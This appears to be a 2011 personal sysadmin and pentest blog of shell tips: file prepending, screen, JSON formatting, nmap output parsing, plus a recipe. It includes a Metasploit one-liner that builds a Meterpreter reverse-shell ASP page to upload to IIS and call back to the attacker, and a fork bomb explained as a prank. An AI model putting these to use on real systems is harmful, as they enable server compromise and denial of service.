Wednesday, November 30, 2011

Telnet awesomeness

Saw this on reddit. I love geeks:


Tuesday, November 29, 2011

Prepending text to a file

no mo' temp files

echo lol > rofl.txt
echo wut | cat - rofl.txt | tee rofl.txt > /dev/null

cat concatenates its operands in order: "-" is stdin (here the piped output of echo), then rofl.txt, so the stream is "wut" followed by the old contents of the file. tee writes that stream back into rofl.txt, and its own copy on stdout is thrown away with > /dev/null.

Caveat: this is a race, not a guarantee. tee opens and truncates rofl.txt as soon as it starts, and nothing forces cat to open and read the file before that happens, so depending on which process gets there first you can end up with a rofl.txt that contains only "wut". Don't use it on anything you can't regenerate. sponge from moreutils exists for exactly this case (it soaks up all of stdin before it opens the output file), and a temp file plus mv, ugly as it is, is the safe version.
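The safe version, as an added example (not the post's one-liner): the temp file is created in the same directory as the target so the final mv is an atomic rename on the same filesystem, and the original is read before anything touches it. The function name and the .prepend.XXXXXX template are mine.

```shell
#!/bin/sh
# prepend_line TEXT FILE: make TEXT the new first line of FILE.
# Added example; the original post's cat/tee pipeline races on the file.
prepend_line() {
    text=$1
    file=$2
    dir=$(dirname "$file")
    tmp=$(mktemp "$dir/.prepend.XXXXXX") || return 1
    # cp -p first so the temp file carries the original's mode/ownership
    # before we overwrite its contents (mktemp makes it 0600 otherwise)
    cp -p "$file" "$tmp" || { rm -f "$tmp"; return 1; }
    # the original is only ever read here; nothing truncates it
    { printf '%s\n' "$text"; cat "$file"; } > "$tmp" || { rm -f "$tmp"; return 1; }
    # rename is atomic: readers see either the old file or the new one
    mv "$tmp" "$file"
}

# Demo on a constructed file (same names as the post)
demo=$(mktemp -d)
printf 'lol\n' > "$demo/rofl.txt"
prepend_line wut "$demo/rofl.txt"
cat "$demo/rofl.txt"      # wut, then lol
rm -rf "$demo"
```

Because mv replaces the directory entry, any hard links to the old file keep the old contents; for a plain file that's the behaviour you want.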

Move running process to screen

ctrl+z   #to suspend the foreground job
bg   #to resume it in the background
disown   #so it survives this shell exiting instead of getting SIGHUP
screen retty $PID   #to pull the process's terminal into a new screen; jobs -l shows the PID

install retty using apt-get

Two caveats. retty works by ptrace-attaching to the process, so it has to be your own process (or you have to be root), and on kernels with Yama's ptrace_scope set to 1 a non-root user can only attach to descendants of the attaching process, so the move is refused. retty is also old, i386-only and unmaintained; reptyr does the same job on current systems (run reptyr PID from inside your screen or tmux window).

Python & Ruby save JSON output

At first I was disgusted by JSON output. Then Python made it pretty. Thanks, Python.

cat t2.json | python -mjson.tool
(python -m json.tool t2.json does the same without the cat; either way it also fails loudly on invalid JSON, which makes it a cheap validator.)
You can do the same thing with Ruby, albeit longer:
cat t2.json | ruby -e "require 'rubygems'; require 'json'; puts JSON.pretty_generate(JSON.parse(STDIN.read))"

Dumping GNU screen output

I like to have a copy of my screen sessions as a text file for future reference and reporting when I do my pentests.

while in screen type C-a :hardcopy -h dumpofwindow1

This creates a file "dumpofwindow1" in screen's working directory, which is wherever you started screen (usually your home dir) unless you changed it with :chdir or set hardcopydir in .screenrc.

You can view it with cat.

*-h dumps the entire scrollback buffer (without it you only get the visible window), so raise defscrollback in .screenrc if you want more than the default 100 lines. It's important to remember that it's useless if you are in less or vi or something similar. If you want a complete record rather than a snapshot, C-a H toggles logging of everything written to the window into screenlog.N, and screen -L turns that on from the start.

Wednesday, November 23, 2011

Understanding the BASH fork bomb

:(){ :|:& }

is a good old-fashioned troll against noobs in Linux. The above defines a function named ":" - this trips up noobies because they don't quite get what that is; they don't realize that a shell function can be named almost anything, not just conventional names like myFunction(). As written it only defines the function; the classic one-liner follows it with ;: to actually call it.

The body of the function runs : piped into :, and the & puts that pipeline in the background, so every call immediately starts two more calls of itself and returns. Each of those starts two more, so the number of processes doubles every generation and the box hits its process limit (or runs out of memory) within seconds. The funny part is if they try to perform some action to free up resources, the function simply uses up those resources again, because every surviving copy is still spawning.

It's a classic. The defense is a per-user process limit: ulimit -u in the shell, or nproc in /etc/security/limits.conf, so the bomb exhausts the user's quota instead of the machine.
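To see the doubling without taking a box down, here is an added example (not from the original post) that keeps the shape of ":" - call yourself twice through a pipe and background the pipeline - but stops after a fixed number of generations and counts the calls. The function names and the tally file are mine.

```shell
#!/bin/sh
# Added example: a depth-bounded stand-in for ':' that tallies its own calls.
# Every call is at least one process, so the tally is a lower bound on what
# the real, unbounded bomb would have spawned by the same generation.

TALLY=""   # file each call appends to; set by count_calls (hypothetical name)

spawn_tree() {                       # $1 = generations still to go
    printf 'x\n' >> "$TALLY"         # one line per call (O_APPEND keeps it atomic)
    [ "$1" -gt 0 ] || return 0       # the only thing the real bomb lacks
    spawn_tree $(($1 - 1)) | spawn_tree $(($1 - 1)) &   # the ':|:&' shape
    wait                             # let the subtree finish so the tally is complete
}

count_calls() {                      # prints the number of calls for depth $1
    TALLY=$(mktemp)
    ( spawn_tree "$1" )
    wc -l < "$TALLY" | tr -d ' '
    rm -f "$TALLY"
}

# Generations 0..4 give 1, 3, 7, 15, 31 calls (2^(d+1) - 1). With a per-user
# limit of a few thousand processes (ulimit -u) the unbounded version runs
# into it around generation 12.
for d in 0 1 2 3 4; do
    printf 'depth %s: %s calls\n' "$d" "$(count_calls "$d")"
done
printf 'current per-user process limit: %s\n' "$(ulimit -u)"
```

The wait on each level is what makes the count deterministic; drop it and the bounded version still terminates, but the tally is read before the tree has finished.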

Ghetto locate

Some boxes don't have locate/updatedb on them for indexed searching of the filesystem. This sucks when you need to look for several files. You can create your own ghetto version by:

find / -print > filesystemlisting
and then grepping through that for your entries.
The find command just outputs every path on the filesystem to that file, as absolute paths. Two things worth adding: 2>/dev/null, because every directory you can't read throws a "Permission denied" on stderr, and -xdev (or pruning /proc, /sys and /dev) so you don't index pseudo-filesystems and network mounts. When you grep the listing, use grep -F so dots in the name you're after aren't treated as regex wildcards.
easy smeasy
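The same idea with those holes plugged, as an added example (not the post's command): a listing function that stays on one filesystem and skips the pseudo-filesystems, and a lookup that treats the search term as a fixed, case-insensitive string. Function names and the demo tree are mine.

```shell
#!/bin/sh
# Added example: find-based filesystem listing plus a locate-style lookup.

# build_listing ROOT OUT: every path under ROOT into OUT, staying on ROOT's
# filesystem and skipping proc, sys and dev directly under ROOT.
build_listing() {
    root=${1%/}      # "/" -> "", so "$root/proc" is "/proc" when ROOT is /
    find "$1" -xdev \
        \( -path "$root/proc" -o -path "$root/sys" -o -path "$root/dev" \) -prune \
        -o -print 2>/dev/null > "$2"
}

# lookup TERM LISTING: -F so "id_rsa" is a literal, not a regex;
# -i because target boxes aren't consistent about case.
lookup() {
    grep -iF -- "$1" "$2"
}

# Demo on a constructed tree (made up for this example).
demo=$(mktemp -d)
mkdir -p "$demo/etc" "$demo/home/bob/.ssh" "$demo/proc/1"
: > "$demo/etc/passwd"
: > "$demo/home/bob/.ssh/id_rsa"
: > "$demo/proc/1/status"
build_listing "$demo" "$demo/listing"
lookup id_rsa "$demo/listing"                       # the .ssh key
lookup status "$demo/listing" || echo "nothing under proc, as intended"
rm -rf "$demo"
```

On a real box run build_listing / /tmp/listing once and query the file repeatedly; the listing is a snapshot, so rebuild it after anything that creates files you care about.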

Thursday, November 10, 2011

Forever Alone Teriyaki Egg Fried Rice

Serves one.

1/2 cup of rice
3/4 cup of water
2 eggs
teriyaki sauce

put the rice and water in your rice cooker. push button. wait. wait some more. when its done, wait 10 more minutes so it actually fucking softens. meanwhile waiting, go to stove. put oil in pan, turn on heat. meanwhile heating, crack eggs into bowl, beat, add some salt. pour eggs into pan, stir with the energy of a thousand suns. bam bitch you just made scrambled eggs. turn off heat, let eggs sit on warm stovetop until rice is done. scoop rice into bowl. scoop eggs into bowl. pour teriyaki sauce like a boss. FEED

Wednesday, November 9, 2011

ASP Encoded Meterpreter Payload

Here is the line to create a meterpreter payload output as an ASP page. Upload this to a web server that executes classic ASP (IIS) and browse to it to have it call back to you. Fill in LHOST with your address, and have a handler (exploit/multi/handler with the same payload, LHOST and LPORT) listening before you request the page, or the connect-back has nothing to talk to:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | msfencode -t asp > lolwut.asp

(R means raw output, which msfencode then wraps in the ASP template. msfpayload and msfencode have since been retired and merged into msfvenom, which takes -p for the payload and -f asp for the output format.)

Thursday, November 3, 2011

Credit Card Validation

bookmark this naow:

Parse .gnmap into separate files

I wanted each host line of my .gnmap file parsed into a separate file with the ports as the contents, one port per line. Below is the one-liner:
for i in $(grep '^Host:' local1.gnmap | cut -d ' ' -f 2 | sort -u); do grep -F "Host: $i " local1.gnmap | awk 'BEGIN {FS=": "} {for(i=1;i<=NF;i++)print $i}' | grep open | awk 'BEGIN {FS="/, "} {for(i=1;i<=NF;i++)print $i}' >> "$i"; done
Replace local1.gnmap with the name of your gnmap file. The first cut of this looped over field 2 of every line, which picked up the "# Nmap ..." comment lines (leaving a stray empty file called Nmap) and hit each host twice, since every host has a Status: line and a Ports: line, so every port was written twice; it also used the IP as an unanchored regex, so 10.0.0.1 matched 10.0.0.10. This version only takes Host: lines, dedupes them and matches the IP as a fixed string. Note that grep open filters whole Ports: fields, not individual entries, so filtered or closed ports listed on the same line still come through, and newer nmap appends an "Ignored State: ..." summary that ends up stuck to the last port of each host. It should produce output like so:
22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)
23/open/tcp//telnet//Cisco router
443/open/tcp//ssl|http//Cisco IOS http config/
This may mean nothing to you, but for me, its going to make grepping through recon SOOOO much simpler.
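If you want the parsing to survive nmap's quirks, here is a small .gnmap parser as an added example (not the post's one-liner). It assumes -oG output where each Ports: entry is port/state/proto/owner/service/rpc/version/ separated by ", ", optionally followed by an Ignored State: summary. The function names and the sample scan are mine; the scan data is constructed, not real.

```shell
#!/bin/sh
# Added example: parse nmap grepable output into "ip port/proto service version"
# lines, keeping only open (and open|filtered) ports.

# gnmap_open_ports FILE
gnmap_open_ports() {
    awk '
    /^Host: / && /Ports: / {
        ip = $2                                      # "Host: IP (name)" -> IP
        line = $0
        sub(/^.*Ports: /, "", line)                  # keep only the port list
        sub(/[ \t]+(Ignored State|OS|Seq Index|IP ID Seq):.*$/, "", line)  # drop trailing fields
        n = split(line, entry, /, /)
        for (i = 1; i <= n; i++) {
            split(entry[i], f, "/")                  # port/state/proto/owner/service/rpc/version
            if (f[2] ~ /^open/)                      # "open" and "open|filtered", not filtered/closed
                print ip, f[1] "/" f[3], f[5], f[7]
        }
    }' "$1"
}

# gnmap_split FILE DIR: like the post, one file per host with its open ports
gnmap_split() {
    mkdir -p "$2"
    gnmap_open_ports "$1" | while read -r ip rest; do
        printf '%s\n' "$rest" >> "$2/$ip"
    done
}

# Constructed sample scan (made up for this example; fields are tab-separated
# in real output, the parser accepts spaces too)
sample_gnmap() {
    cat <<'EOF'
# Nmap 5.51 scan initiated Thu Nov  3 10:00:00 2011 as: nmap -sV -oG local1.gnmap 10.0.0.0/30
Host: 10.0.0.1 ()	Status: Up
Host: 10.0.0.1 ()	Ports: 22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)/, 23/open/tcp//telnet//Cisco router/, 443/open/tcp//ssl|http//Cisco IOS http config/	Ignored State: closed (997)
Host: 10.0.0.2 (fw.example.test)	Status: Up
Host: 10.0.0.2 (fw.example.test)	Ports: 80/open/tcp//http//nginx/, 8080/filtered/tcp//http-proxy///	Ignored State: closed (998)
Host: 10.0.0.3 ()	Status: Up
# Nmap done at Thu Nov  3 10:01:00 2011 -- 4 IP addresses (3 hosts up) scanned in 60.00 seconds
EOF
}

# Demo
demo=$(mktemp -d)
sample_gnmap > "$demo/local1.gnmap"
gnmap_open_ports "$demo/local1.gnmap"        # four lines, 8080/filtered dropped
gnmap_split "$demo/local1.gnmap" "$demo/hosts"
ls "$demo/hosts"                              # 10.0.0.1 and 10.0.0.2 only
rm -rf "$demo"
```

nmap escapes a "/" inside service and version fields as "|" (that is where ssl|http comes from), so splitting on "/" is safe; a version string that itself contained ", " would still confuse the entry split, so eyeball anything with a suspiciously short version field.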